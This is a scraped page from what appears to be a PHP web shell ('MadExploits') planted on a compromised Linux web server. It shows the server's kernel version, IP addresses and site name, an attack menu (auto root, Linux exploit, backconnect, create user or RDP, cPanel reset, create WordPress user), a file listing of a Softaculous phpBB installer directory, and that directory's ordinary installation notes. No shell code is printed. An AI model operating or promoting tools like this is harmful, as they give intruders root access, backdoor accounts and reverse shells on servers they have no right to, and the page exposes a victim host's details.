Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.119.118.151
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
phpbb /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
11.69
KB
-rw-r--r--
clone.php
4.4
KB
-rw-r--r--
config.php
481
B
-rw-r--r--
edit.php
4.37
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
333
B
-rw-r--r--
import.php
3.18
KB
-rw-r--r--
info.xml
2.94
KB
-rw-r--r--
install.js
1
KB
-rw-r--r--
install.php
8.42
KB
-rw-r--r--
install.xml
2.39
KB
-rw-r--r--
io_lock.lock
2
B
-rw-r--r--
md5
3.6
KB
-rw-r--r--
notes.txt
1.54
KB
-rw-r--r--
upgrade.php
4.89
KB
-rw-r--r--
upgrade.xml
370
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
While installing, Select Database type : MySQL with MySQLi Extension 1. Add [[language]] in sql. Take reference from older sql. 2. Apart from english, download ext, languages and styles folder from : http://www.phpbb.com/languages/?from=submenu and unzip it to ext, languages and styles folder. ext is added in phpBB 3.2.0 hence is not available for few languages. 3. Update once manually to check if database is updated properly 4. Add as many languages as you can. 5. If you want to add language add its entry in install.php as well. 6. Update the file database_update.php (from original zip under install directory) and _database_update.php (from original zip + our changes) of the new version. This change is for auto upgrade. (Not required since 3.2.1) Following is our change : // Softaculous Change $config['default_lang'] = 'en'; 7. have removed <option value="pt_br">Portuguese Brazilian</option> in 3.1.6 and 3.1.7-pl1. Portuguese Brazilian zip sturcture was wrong and was not compatible with older zip. Add it back (in install.xml and install.php)in next version if structure is correct. 8. Check for "rand_seed" and "rand_seed_last_update" value in database for next update, it gets generated on localhost but not on linux servers (since v3.2.0). 9. phpbb_viglink_api_key in database is default key at "ext\phpbb\viglink\migrations\viglink_data.php" check in the next version. 10. PHP REQUIREMENT LINK: /docs/INSTALL.html#require 11. Keep "user_permissions" value blank in users table as it creates on login with admin details. 12. UPGRADE NOTES: docs/install.html
Close